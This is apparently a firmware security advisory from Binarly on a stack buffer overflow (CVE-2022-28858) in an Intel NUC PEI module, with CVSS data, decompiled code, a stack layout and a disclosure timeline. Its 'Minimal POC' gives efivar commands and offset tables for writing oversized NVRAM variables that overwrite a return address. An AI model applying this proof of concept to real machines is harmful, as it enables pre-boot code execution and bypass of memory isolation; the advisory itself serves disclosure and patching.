[BRLY-2022-027] The stack buffer overflow vulnerability leads to arbitrary code execution during PEI phase on Intel platform.
Summary
BINARLY efiXplorer team has discovered a stack buffer overflow vulnerability on Intel platforms allowing a possible attacker to execute arbitrary code during PEI phase.
Vulnerability Information
- BINARLY internal vulnerability identifier: BRLY-2022-027
- Intel PSIRT assigned CVE identifier: CVE-2022-28858
- AMI PSIRT assigned CVE identifier: CVE-2022-26873
- CERT/CC assigned case number: VU#158026
- FwHunt rule: BRLY-2022-027
- CVSS v3.1: 8.2 High AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
Affected Intel firmwares with confirmed impact by Binarly team
| Device/Firmware | File Name | SHA256 (File PE32 section) | File GUID |
|---|---|---|---|
| Intel NUC M15 | PlatformInitAdvancedPreMem | 644044fdb8daea30a7820e0f5f88dbf5cd460af72fbf70418e9d2e47efed8d9b | EEEE611D-F78F-4FB9-B868-55907F169280 |
Potential impact
A potential attacker can execute an arbitrary code at the time of the PEI phase and influence the subsequent boot stages. This can lead to the mitigasions bypassing, physical memory contents disclosure, discovery of any secrets from any Virtual Machines (VMs) and bypassing memory isolation and confidential computing boundaries. Additionally, an attacker can build a payload which can be injected into the SMRAM memory.
Vulnerability description
The pseudocode for vulnerable function is shown below:
int __thiscall sub_FFAE2B82(void *this)
{
...
const EFI_PEI_SERVICES **PeiServices;
char CpuSetupData[1072];
UINTN DataSize;
EFI_PEI_READ_ONLY_VARIABLE2_PPI *Ppi;
...
DataSize = 1072;
Ppi->GetVariable(Ppi, L"SaSetup", &gSaSetupGuid, 0, &DataSize, CpuSetupData);
Ppi->GetVariable(Ppi, L"CpuSetup", &gCpuSetupGuid, 0, &DataSize, CpuSetupData);
...
return 0;
}
If the value of the SaSetup NVRAM variable is larger than 1072 bytes, then after the first call of the Ppi->GetVariable() service, the DataSize value will be overwritten with the real size of the SaSetup NVRAM variable.
After second call of the Ppi->GetVariable() service stack overflow may occur.
An overflow of 24 bytes is enough to execute arbitrary code:
-00000440 CpuSetupData db 1072 dup(?)
-00000010 var_10 db ?
-0000000F db ? ; undefined
-0000000E var_E dd ?
-0000000A db ? ; undefined
-00000009 db ? ; undefined
-00000008 DataSize dd ?
-00000004 Ppi dd ? ; offset
+00000000 s db 4 dup(?)
+00000004 r db 4 dup(?)
Minimal POC
sudo efivar -w -f SaSetupData_new.bin --name 72c5e28c-7783-43a1-8767-fad73fccafa4-SaSetup
sudo efivar -w -f CpuSetupData_new.bin --name b08f97ff-e6e8-4193-a997-5e9e9b0adb32-CpuSetup
sudo reboot
The data in the file SaSetupData_new.bin may be as follows:
| Offset | Data |
|---|---|
| 0x0 | Old data of SaSetup NVRAM variable |
| 0x430 | Some data |
| 0x444 | Last dword |
The data in the file CpuSetupData_new.bin may be as follows:
| Offset | Data |
|---|---|
| 0x0 | Old data of CpuSetup NVRAM variable |
| 0x244 | Some data |
| 0x444 | New return address |
Disclosure timeline
This bug is subject to a 90 day disclosure deadline. After 90 days elapsed or a patch has been made broadly available (whichever is earlier), the bug report will become visible to the public.
| Disclosure Activity | Date |
|---|---|
| Intel PSIRT is notified | 2022-02-11 |
| Intel PSIRT confirmed reported issue | 2022-03-22 |
| Intel PSIRT assigned CVE number | 2022-03-22 |
| Intel PSIRT provide patch release | 2022-03-22 |
| BINARLY public disclosure date | 2022-08-10 |
Acknowledgements
BINARLY efiXplorer team